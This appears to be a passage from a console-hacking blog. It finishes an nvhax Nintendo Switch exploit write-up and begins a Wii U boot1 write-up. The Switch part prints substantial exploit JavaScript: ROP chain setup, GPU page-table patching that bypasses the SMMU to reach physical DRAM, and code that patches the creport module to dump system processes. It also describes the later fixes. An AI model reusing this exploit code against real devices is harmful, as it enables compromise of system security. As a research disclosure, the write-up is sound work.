}
}
// Write extra args
if (fargs.length > 0) {
for (var i = 0; i < fargs.length && i < 32; i++)
this.write_nvdrv_mem(utils.add2(load_buf, 0x110 + 8 * i), fargs[i]);
}
// Store main branch
this.write_nvdrv_mem(utils.add2(save_buf, 0x28), store_branch_60);
// Prepare vtable context
this.write_nvdrv_mem(save_buf, vtable_save);
this.write_nvdrv_mem(vtable_save, save);
this.write_nvdrv_mem(utils.add2(sp, 0x8), ldr_x0_ret);
sp = utils.add2(sp, 0x10);
// Save
this.write_nvdrv_mem(utils.add2(sp, 0x08), load_buf);
this.write_nvdrv_mem(utils.add2(sp, 0x18), load);
sp = utils.add2(sp, 0x20);
// Set up calling context
this.write_nvdrv_mem(utils.add2(sp, 0x08), ldr_x19_ret);
this.write_nvdrv_mem(utils.add2(load_buf, 0x80), func_ptr);
this.write_nvdrv_mem(utils.add2(load_buf, 0xF8), sp);
this.write_nvdrv_mem(utils.add2(load_buf, 0x100), br_x16);
sp = utils.add2(sp, 0x10);
// Unwrap call object
var srv_handle = call_obj[0];
var nvdrv_buf = call_obj[1];
var mem_addr = call_obj[2];
// Open random device to trigger ROP
this.nvdrv_open(nvdrv_buf, "/dev/random");
// Grab result buffer
var hax_buf = utils.add2(rop_buf, 0x10000);
// Read back result
var ret = this.read_nvdrv_mem(utils.add2(hax_buf, 0x10));
if (args.length > 0) {
for (var i = 0; i < 30 && i < args.length; i++) {
if (ArrayBuffer.isView(args[i]) || args[i] instanceof ArrayBuffer) {
var size = args[i].byteLength;
this.do_nvdrv_memcpy_out(this.getArrayBufferAddr(args[i]), saddrs[i], size);
}
}
}
return ret;
}
sploitcore.prototype.init_nvhax = function(sm_handle) {
// Get nvservices base address
var nvdrv_base = this.get_nvdrv_base(sm_handle);
// Save sm_handle and nvdrv_base
this.nvdrv_exp_ctx[0] = sm_handle;
this.nvdrv_exp_ctx[1] = nvdrv_base;
// Install read/write primitives
this.install_nvdrv_rw();
utils.log("RW primitives installed!");
// Build up the ROP chain
this.build_nvdrv_rop();
utils.log("ROP chain buffer built!");
// Build the ROP call object
var call_obj = this.build_nvdrv_call_obj();
utils.log("ROP call object built!");
// Allocate temporary buffer
var tmp_buf_size = 0x800000;
var tmp_buf = this.malloc(tmp_buf_size);
// Initialize call context
this.nvdrv_exp_ctx[7] = call_obj;
this.nvdrv_exp_ctx[8] = tmp_buf;
this.nvdrv_exp_ctx[9] = tmp_buf_size;
utils.log("nvservices base address: " + utils.paddr(nvdrv_base));
utils.log("nvservices test address: " + utils.paddr(utils.add2(this.nvdrv_exp_ctx[6], 0x40000)));
}
With a combination of mass memory allocations to manipulate the transfer memory's base address, some clever null byte writes and object overlaps we are now able to build very powerful read and write primitives using the transfer memory region and thus gain the ability to copy memory between the browser process and nvservices. Achieving ROP is now way easier and surprisingly stable with the exploit chain working practically 9 out of 10 times.
By now, smhax had already been discovered hence why nvdrv:t is being used in the code instead. However, this was purely experimental (to understand the different services' access levels) and is not a requirement. The exploit chain works without taking advantage of smhax or any other already patched bugs.

We finally escaped the browser and have full control over nvservices so, what should we do next? What about take the entire system down? ;)

The Aftermath


You may recall from gspwn (see https://www.3dbrew.org/wiki/3DS_System_Flaws#Standalone_Sysmodules) on the 3DS that GPUs are often a great place to look into when exploiting a system. Having this in mind since the beginning motivated me to attack nvservices in the first place and, fortunately, the Switch was no exception when it comes to properly secure a GPU.
After SciresM's incredible work on maturing ROP for nvservices, I began looking into what could be done with the GM20B inside the Switch. A large amount of research took place over the following weeks, combining the publicly available Tegra's source code and TRM with the envytools/nouveau project's code and my own reverse engineering of the nvservices system module. It was at this time that this incredibly enlightening quote from the Tegra X1's TRM was found:




If you watched the 34C3 Switch Security talk you probably remember this. If not, then I highly recommend at least re-reading the slides over here: https://switchbrew.github.io/34c3-slides/

I/O devices inside the Tegra X1's SoC are subjected to what ARM calls the SMMU (System Memory Management Unit). The SMMU is simply a memory management unit that stands between a DMA capable input/output bus and the main memory chip. In the Tegra X1's and, consequentially, the Switch's case, it is the SMMU that is responsible for translating accesses from the APB (Advanced Peripheral Bus) to the DRAM chips. By properly configuring the MC (Memory Controller) and locking out the SMMU's page table behind the kernel, this effectively prevents any peripheral device to access more memory than it should.
Side note: on firmware version 1.0.0 it was actually possible to access the MC's MMIO region and thus completely disable the SMMU. This attack was dubbed mchammer and was presented at the 34C3 Switch Security by plutoo, derrek and naehrwert.

So, we now know that the GPU has its own MMU (accordingly named GMMU) and that it is capable of bypassing entirely the SMMU. How do we even access it?
There are many different ways to achieve this but, at the time and using the limited documentation available for the Maxwell GPU family, this is what I came up with:
  • Scan nvservices' memory space using svcQueryMemory and find all memory blocks with the attribute IsDeviceMapped set. Odds are that this block is mapped to an I/O device and thus the GPU.
  • Locate the 0xFACE magic inside these blocks. This magic word is used as a signature for GPU channels so, if we find it, we found a GPU channel structure.

sploitcore.prototype.nvhax_find_channel = function(hw_num) {
var mem_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
var page_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40100);
var test_addr = [0, 0];
var ch_base_addr = [0, 0];
// Look for user channel
while (test_addr[1] < 0x80)
{
var result = this.nvhax_svc(0x06, [mem_info_addr, page_info_addr, test_addr], [], false);
var mem_base_addr = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x00));
var mem_size = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x08));
var mem_type_attr = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x10));
var mem_perm_ipc = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x18));
var mem_dev_pad = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x20));
var mem_type = mem_type_attr[0];
var mem_attr = mem_type_attr[1];
var mem_perm = mem_perm_ipc[0];
var mem_ipc = mem_perm_ipc[1];
var mem_dev = mem_dev_pad[0];
var mem_pad = mem_dev_pad[1];
if (((mem_attr & 0x04) == 0x04)
&& (mem_size[0] <= 0x10000))
{
var ch_sig = this.read_nvdrv_mem(utils.add2(mem_base_addr, 0x10));
var ch_num = this.read_nvdrv_mem(utils.add2(mem_base_addr, 0xE8));
if (ch_sig[0] == 0xFACE)
{
utils.log('Found channel 0x' + ch_num[0].toString(16) + ': ' + utils.paddr(mem_base_addr));
if (ch_num[0] == hw_num)
{
ch_base_addr = mem_base_addr;
break;
}
}
}
var next_addr_lo = (((test_addr[0] + mem_size[0]) & 0xFFFFFFFF) >>> 0);
var next_addr_hi = (((test_addr[1] + mem_size[1]) & 0x000000FF) >>> 0);
if ((test_addr[0] + mem_size[0]) > 0xFFFFFFFF)
next_addr_hi++;
test_addr[0] = next_addr_lo;
test_addr[1] = next_addr_hi;
}
return ch_base_addr;
}

  • Find the GPU channel's page table. Each GPU channel contains a page directory that we can traverse to locate and replace page table entries. Remember that these entries are used by the GMMU and not the SMMU which means not only they follow a different format but also that the addresses used by the GMMU represent virtual GPU memory addresses.
  • Patch GPU channel's page table entries with any memory address we want. The important part here is setting bit 31 in each page table entry as this tells the GMMU to access physical memory directly instead of going through the SMMU as usual.

sploitcore.prototype.nvhax_patch_channel = function(ch_base_addr, target_paddr) {
// Map GPU MMIO
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
// Page directory is always at channel + 0x15000
var pdb_vaddr = utils.add2(ch_base_addr, 0x15000);
// Read page directory base IOVA
var pdb_iova_lo = this.nvhax_read32(utils.add2(ch_base_addr, 0x200));
var pdb_iova_hi = this.nvhax_read32(utils.add2(ch_base_addr, 0x204));
var pdb_iova = ((pdb_iova_lo >> 0x08) | (pdb_iova_hi << 0x18));
// Page table is always at pdb + 0x2000
var ptb_vaddr = utils.add2(pdb_vaddr, 0x2000);
// Read the first entry
var pte_test = this.nvhax_read32(ptb_vaddr);
// Encode the target physical address
var pte_val = ((((target_paddr >> 0x08) & 0x00FFFFFF) >>> 0) | 0x01);
// Replace the PTEs
this.nvhax_write32(utils.add2(ptb_vaddr, 0x00), pte_val + 0x000);
this.nvhax_write32(utils.add2(ptb_vaddr, 0x08), pte_val + 0x200);
this.nvhax_write32(utils.add2(ptb_vaddr, 0x10), pte_val + 0x400);
this.nvhax_write32(utils.add2(ptb_vaddr, 0x18), pte_val + 0x600);
this.nvhax_write32(utils.add2(ptb_vaddr, 0x20), pte_val + 0x800);
this.nvhax_write32(utils.add2(ptb_vaddr, 0x28), pte_val + 0xA00);
this.nvhax_write32(utils.add2(ptb_vaddr, 0x30), pte_val + 0xC00);
this.nvhax_write32(utils.add2(ptb_vaddr, 0x38), pte_val + 0xE00);
var mmu_ctrl_fifo_space = 0;
var mmu_ctrl_fifo_empty = 0;
// Poll fb_mmu_ctrl_r
while (!mmu_ctrl_fifo_space)
{
var mmu_ctrl_data = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x00100C80));
mmu_ctrl_fifo_space = ((mmu_ctrl_data >> 0x10) & 0xFF);
}
// Write to fb_mmu_invalidate_pdb_r
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x00100CB8), pdb_iova);
// Write to fb_mmu_invalidate_r
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x00100CBC), 0x80000001);
// Poll fb_mmu_ctrl_r
while (!mmu_ctrl_fifo_empty)
{
var mmu_ctrl_data = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x00100C80));
mmu_ctrl_fifo_empty = ((mmu_ctrl_data >> 0x0F) & 0x01);
}
var l2_flush_dirty_outstanding = 0;
var l2_flush_dirty_pending = 0;
var l2_system_invalidate_outstanding = 0;
var l2_system_invalidate_pending = 0;
// Write to flush_l2_flush_dirty_r
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x00070010), 0x01);
// Poll flush_l2_flush_dirty_r
while (l2_flush_dirty_outstanding && l2_flush_dirty_pending)
{
var l2_flush_dirty_data = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x00070010));
l2_flush_dirty_outstanding = ((l2_flush_dirty_data >> 0x01) & 0x01);
l2_flush_dirty_pending = ((l2_flush_dirty_data >> 0x00) & 0x01);
}
// Write to flush_l2_system_invalidate_r
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x00070004), 0x01);
// Poll flush_l2_system_invalidate_r
while (l2_system_invalidate_outstanding && l2_system_invalidate_pending)
{
var l2_system_invalidate_data = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x00070004));
l2_system_invalidate_outstanding = ((l2_system_invalidate_data >> 0x01) & 0x01);
l2_system_invalidate_pending = ((l2_system_invalidate_data >> 0x00) & 0x01);
}
// Calculate the channel's IOVA for PEEPHOLE
var ch_iova = ((((pdb_iova - 0x200) >> 0x04) & 0x0FFFFFFF) >>> 0);
return ch_iova;
}

  • Get the GPU to access our target memory address via GMMU. I decided to use a rather obscure engine inside the GPU that envytools/nouveau calls the PEEPHOLE (see https://envytools.readthedocs.io/en/latest/hw/memory/peephole.html). This engine can be programmed by poking some GPU MMIO registers and provides a small, single word, window to read/write virtual memory covered by a particular GPU channel. Since we control the channel's page table and we've set bit 31 on each entry, any read or write going through the PEEPHOLE engine will access any DRAM address we want!

sploitcore.prototype.nvhax_peephole_dump_mem = function(ch_iova, gpu_va, mem_size) {
// Map GPU MMIO
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
// Write the channel's iova in PEEPHOLE PBUS register
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova));
// Write the GPU virtual address in PEEPHOLE registers
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);
var mem_buf = this.malloc(mem_size);
// Dump memory
for (var i = 0; i < (mem_size / 0x04); i++)
{
var val = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x60014));
this.write4(val, mem_buf, (i * 0x04)/0x04);
}
this.memdump(mem_buf, mem_size, "memdumps/dram.bin");
this.free(mem_buf);
}
sploitcore.prototype.nvhax_peephole_read32 = function(gpu_io_vaddr, ch_iova, gpu_va) {
// Write the channel's iova in PEEPHOLE PBUS register
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova));
// Write the GPU virtual address in PEEPHOLE registers
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);
// Read out one word
var mem_val = this.nvhax_read32(utils.add2(gpu_io_vaddr, 0x60014));
return mem_val;
}
sploitcore.prototype.nvhax_peephole_write32 = function(gpu_io_vaddr, ch_iova, gpu_va, mem_val) {
// Write the channel's iova in PEEPHOLE PBUS register
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova));
// Write the GPU virtual address in PEEPHOLE registers
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]);
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]);
// Write in one word
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60014), mem_val);
}
After all this, we now have a way to dump the entire DRAM... well, sort of.
An additional layer of protection is enforced at the MC level and that is the memory carveouts. These are physical memory ranges that can be completely isolated from direct memory access.

Since I first implemented all this in firmware version 2.0.0, dumping the entire DRAM only gave me every non-built-in system module and applet that was loaded into memory. However, SciresM later tried it on 1.0.0 and realized we could dump the built-in system modules there!
Turns out, while the kernel has always been protected by a generalized memory carveout, the built-in system modules were loaded outside of this carveout in firmware 1.0.0.
Additionally, the kernel itself would start allocating memory outside of the carveout region if necessary. So, by exhausting some kernel resource (such as service handles) up to the point where kernel objects would start showing up outside of the carveout region, SciresM was able to corrupt an object and take over the kernel as well.
From that point on, we could use jamais vu (see https://www.reddit.com/r/SwitchHacks/comments/7rq0cu/jamais_vu_a_100_trustzone_code_execution_exploit/) to defeat the Secure Monitor and later use warmboothax to defeat the entire boot chain. But, that wasn't the end...

I wanted to reach the built-in system modules on recent firmware versions as well, so SciresM and I cooked up a plan:
  • Use smhax to load the creport system module in waiting state.
  • Use gmmuhax to find and patch creport directly in DRAM.
  • Launch a patched creport system module that would call svcDebugActiveProcess, svcGetDebugEvent and svcReadDebugProcessMemory with arguments controlled by us.
  • Use the debug SVCs to dump all running built-in system modules. 

sploitcore.prototype.nvhax_patch_creport = function(ch_base_addr, dram_addr, pid, mem_offset, mem_size) {
var gpu_va = [0, 0x04];
var dram_base_addr = (dram_addr & 0xFFF00000);
var dram_offset = (dram_addr & 0x000F0000);
// Map GPU MMIO
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
// Patch the channel with the base DRAM address
var ch_iova = this.nvhax_patch_channel(ch_base_addr, dram_base_addr);
// Write target PID somewhere
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A000), pid);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A008), 0);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A010), mem_size);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A018), mem_offset);
// Replace "nnMain" branch
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x000D8), 0x9400595A);
// Install svcDebugActiveProcess hook
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16640), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16644), 0xF9400081);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16648), 0xD4000C01);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1664C), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16650), 0xB9002080);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16654), 0xB9002481);
// Install svcGetDebugEvent hook (process)
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16658), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1665C), 0x91010080);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16660), 0xB9402481);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16664), 0xD4000C61);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16668), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1666C), 0xB9003080);
// Install svcGetDebugEvent hook (thread)
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16670), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16674), 0x91010080);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16678), 0xB9402481);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1667C), 0xD4000C61);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16680), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16684), 0xB9003080);
// Install svcReadDebugProcessMemory hook
if (mem_size == 0x4000)
{
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16688), 0x90000064);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1668C), 0x91100080);
}
else
{
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16688), 0xF0000044);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1668C), 0x91000080);
}
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16690), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16694), 0xF9400C85);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16698), 0xF8424081);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1669C), 0xF9403082);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166A0), 0x8B050042);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166A4), 0xB9401083);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166A8), 0xD4000D41);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166AC), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166B0), 0xB9007080);
// Return
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166B4), 0xD65F03C0);
return [gpu_io_vaddr, ch_iova];
}
sploitcore.prototype.nvhax_dump_proc = function(sm_handle, ch_base_addr, pid, start_offset, end_offset, is_small) {
var tmp_mem_buf = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
var creport_tid = [0x00000036, 0x01000000];
var creport_dram_addr = 0x94950000;
var data_gpu_va = [0x71000, 0x4];
var status_gpu_va = [0x7A000, 0x4];
var mem_offset = start_offset;
var mem_size = 0x8000;
var mem_read_state = 0;
// Use smaller blocks instead
if (is_small)
{
data_gpu_va = [0x72400, 0x4];
mem_size = 0x4000;
}
// Allocate memory buffer
var mem_buf = this.malloc(mem_size);
while (!mem_read_state && (mem_offset < end_offset))
{
// Launch creport in waiting state
var proc_pid = this.launch_proc(sm_handle, 0x03, creport_tid, "120", 0x02);
// Patch creport
var ctx_res = this.nvhax_patch_creport(ch_base_addr, creport_dram_addr, pid, mem_offset, mem_size);
// Get context
var gpu_io_vaddr = ctx_res[0];
var ch_iova = ctx_res[1];
// Start patched creport
this.start_proc(sm_handle, proc_pid);
// Copy memory into nvservices
this.nvhax_dram_memcpy(gpu_io_vaddr, ch_iova, data_gpu_va, tmp_mem_buf, mem_size);
// Copy memory from nvservices
this.do_nvdrv_memcpy_out(mem_buf, tmp_mem_buf, mem_size);
// Dump memory
this.memdump(mem_buf, mem_size, "memdumps/dram.bin");
// Increase source memory offset
mem_offset += mem_size;
// Check debug SVC result
mem_read_state = this.nvhax_peephole_read32(gpu_io_vaddr, ch_iova, utils.add2(status_gpu_va, 0x70));
}
this.free(mem_buf);
}
This worked for getting all built-in system modules (except boot, which only runs once and ends up overwritten in DRAM)! Naturally, we didn't know about nspwn back then so all this was moot.
However, firmware version 5.0.0 fixed nspwn and suddenly all this was relevant again. We had to work around the fact that smhax was no longer available which required some very convoluted tricks using DRAM access to hijack other system modules.
To make matters worse, Switch units with new fuse patches for the well known RCM exploit were being shipped so the need for nvhax was now very real.

The Fixes


While the GMMU attack itself cannot be fixed (since it's an hardware flaw), some mitigations have been implemented such as creating a separate memory pool for nvservices.

As for nvhax, all 3 bugs mentioned in this write-up have now been fixed in firmware versions 6.0.0 (Transfer Memory leak) and 6.2.0 (NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE and NVMAP_IOC_FREE bugs).

The fix for the Transfer Memory leak consists on simply tracking the address and size of the transfer memory region inside nvservices and every time a service handle is closed, the entire region is cleared before becoming available to the client again.

The NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE bug was fixed by changing its implementation to match every other ioctl command: have the command take "in-line" parameters instead of a memory pointer. The command now returns the 2 warpstate structs directly which are now also properly initialized.

As for the NVMAP_IOC_FREE bug, it now takes into account the case where the client doesn't supply its own memory and prevents the nvservices' transfer memory pointer to be leaked back.

Conclusion


This was definitely one of the most fun exploits I ever worked on, but the absolute best part was having the opportunity to develop it alongside such talented individuals like plutoo, SciresM and many others.
Working on this was a blast and knowing how long it managed to remain unpatched was surprisingly amusing.

As promised, an updated version of this exploit chain written for firmware versions 4.1.0, 5.x and 6.0.0 will be progressively merged into the PegaSwitch project.

As usual, have fun!

Sunday, January 14, 2018

Anatomy of a Wii U: The End...?

Welcome to a new write-up! Last time I wrote one of these was months ago, but I had good reasons for that (*cough*Switch*cough*).

Since as early as March, I've been working non-stop on hacking and reverse engineering the Switch alongside extremely talented hackers/developers such as plutoo, derrek, yellows8 and SciresM.
Together we have achieved incredible milestones and I'm really glad all our hard work eventually paid off.

That said, let's move on to the reason for this post: the Wii U.
If you are one of those few weirdos enthusiasts that still care about this console, you might recall last year's CCC where derrek, naehrwert and nedwill showcased their progress in hacking the last bits of the 3DS and Wii U.
Back then, they demonstrated their own exploitation path for taking down both the PPC and ARM processors on the Wii U, which was something that had already been publicly achieved using different bugs/exploits. This was also achieved much earlier by the hacking group fail0verflow which showcased their findings during the 30th edition of the CCC (back in 2013).

It was a very cool talk all around, but the main highlight for Wii U hacking fans was something derrek brought up: boot1.
This particular piece of the Wii U's boot chain was never obtained up until derrek and his team (plutoo, yellows8, smealum and naehrwert) successfully launched an hardware based attack that resulted in dumping the boot1 key.
The setup for this attack remained private, but the overall exploitation process was explained during the talk and is also documented here: http://wiiubrew.org/wiki/Wii_U_System_Flaws#boot0

That was the last nail in the Wii U's coffin... or was it? Naturally, after obtaining the boot1 binary, derrek and his team began looking for vulnerabilities in it. While most of the usually critical stuff (signature handling, file parsing, etc.) was found to be safely implemented, derrek, plutoo, yellows8, naehrwert and shuffle2 did find one potential bug. However, due to lack of motivation and time, it remained just a theory.

I even wrote a blog post about all this where I mistakenly assumed some things that weren't true. Then I issued another blog post apologizing for said assumptions... Those were confusing times. :P
However, that's what got me to chat with derrek and get to know him better.

After some discussions about boot1, derrek agreed on sharing with me the potential bug that was mentioned during CCC. His team was already getting ready for the Switch release and they had little to no time left to work on trying to exploit this bug, so I offered my help.

A few days later I found a way to exploit this bug and achieved boot1 code execution! Neat, huh?
So, without further ado, I present you a writeup on the mythical boot1hax. :D

NOTE: Obtaining the boot1 binary in the first place is out of scope for the purposes of this writeup.

The Bug

The bug itself is really simple.
After some hours reverse engineering the boot1 binary and using the information derrek had shared with me, finding the bug was straightforward.
However, to understand it, we have to look into a specific IOSU process: IOS-MCP.

Wait, IOS-MCP? That loads AFTER boot1, what could possibly relate them?
Turns out, IOS-MCP manages something that plenty of people have already looked into (and maybe even guessed it's purpose), but couldn't exactly undestand what it does.

There is a range of physical memory mapped in IOSU that appears to serve no clear purpose: 0x10000000 to 0x100FFFFF (see http://wiiubrew.org/wiki/Physical_Memory).

The typical layout of this region is as follows:
0x10000000: 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0
...
0x100003F0: 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0
0x10000400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
...
0x10005A40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005A50: 00 00 00 00
0x10005A54: PRSH XOR checksum
0x10005A58: "PRSH" // magic
0x10005A5C: 0x00000001 // version (0 or 1)
0x10005A60: 0x0000259C // size
0x10005A64: 0x00000001 // unk
0x10005A68: 0x00000020 // max_sections
0x10005A6C: 0x00000007 // num_sections
... // PRSH sections
0x10007FF0: PRST XOR checksum
0x10007FF4: 0x0000259C // size
0x10007FF8: 0x00000001 // unk
0x10007FFC: "PRST" // magic
view raw 0x10000000.txt hosted with ❤ by GitHub
Breaking it down, we have a pattern filling the first 0x400 bytes followed by NULL bytes up until this PRSH/PRST structure:
typedef struct {
char name[0x100];
void* data;
u32 size;
u32 unk;
u8 hash[0x14];
u8 padding[0x0C];
} prsh_section;
typedef struct {
u32 xor_checksum;
u32 magic;
u32 version;
u32 size;
u32 unk;
u32 max_sections;
u32 num_sections;
prsh_section sections[];
} prsh;
typedef struct {
u32 xor_checksum;
u32 size;
u32 unk;
u32 magic;
} prst;
view raw prsh_prst.c hosted with ❤ by GitHub
This structure is created by IOS-MCP to keep track of the addresses and sizes of several memory regions. It is encapsulated with a header (PRSH) and a footer (PRST) and contains an array of structures describing memory regions.
In the latest firmware version, only 7 regions are registered in this structure. Here's an example parsed from my console:
Name: "boot_info"
Address: 0x10008000
Size: 0x00000058
UNK: 0x80000000
Name: "mcp_crash_region"
Address: 0x100F7F60
Size: 0x000080A0
UNK: 0x80000000
Name: "mcp_syslog_region"
Address: 0x1FF7FFD0
Size: 0x00080030
UNK: 0x80000000
Name: "mcp_fs_cache_region"
Address: 0x100D7EE0
Size: 0x00020080
UNK: 0x80000000
Name: "mcp_ramdisk_region"
Address: 0x100B7494
Size: 0x0000006C
UNK: 0x80000000
Name: "mcp_list_region"
Address: 0x1FE62C40
Size: 0x0011D390
UNK: 0x80000000
Name: "mcp_launch_region"
Address: 0x100B645C
Size: 0x00001038
UNK: 0x80000000
While most of these regions contain nothing particularly interesting, there is one exception: boot_info.
This region stores data passed along from boot0 and boot1 to IOS-MCP! An example from my console:
0x00000000: 0x00000001 // Always 1 (set by boot1 on coldboot)
0x00000004: 0xA6000000 // Boot flags (0x80 means data is set)
0x00000008: 0x00000000 // Boot state
0x0000000C: 0x00000001 // Boot count (increased by boot1 on reset)
0x00000010: 0x00100000 // Set to 0 by boot1 on coldboot
0x00000014: 0x00000000 // Set to 0 by boot1 on coldboot
0x00000018: 0xFFFFFFFF // Set to -1 by boot1 on coldboot
0x0000001C: 0xFFFFFFFF // Set to -1 by boot1 on coldboot
0x00000020: 0xFFFFFFFF // Set to -1 by boot1 on coldboot
0x00000024: 0xFFFFFFFF // Set to -1 by boot1 on coldboot
0x00000028: 0xFFFFFFFF // Set to -1 by boot1 on AHB reset
0x0000002C: 0xFFFFFFFF // Set to -1 by boot1 on AHB reset
0x00000030: 0x00000000 // Set to 0 by boot1 on AHB reset
0x00000034: 0x00000000 // Set to 0 by boot1 on AHB reset
0x00000038: 0x00369F6B // boot1_main
0x0000003C: 0x00297268 // boot1_read
0x00000040: 0x0005FCFE // boot1_verify
0x00000044: 0x00053CE8 // boot1_decrypt
0x00000048: 0x00012030 // boot0_main
0x0000004C: 0x000029D2 // boot0_read
0x00000050: 0x0000D281 // boot0_verify
0x00000054: 0x0000027A // boot0_decrypt
view raw boot_info.txt hosted with ❤ by GitHub
As an example, the last 8 fields contain the time spent on each boot0/boot1 stage and this data is printed on crash logs.

What derrek and his team found out by looking at the boot1 binary is that this structure is also passed back to boot1!
How? Well, right before a reset is asserted, IOS-MCP encrypts the entire 0x10000400 to  0x10008000 range with the Starbuck ancast key. When the console reboots, RAM contents are not cleared and boot1 will decrypt this range and parse the PRSH/PRST struct looking for the boot_info region.

Even though this might look like a weird way to pass data back and forth across the boot chain, this process is actually properly implemented and boot1's code for parsing the PRSH/PRST structure is sound. But there is one exception...

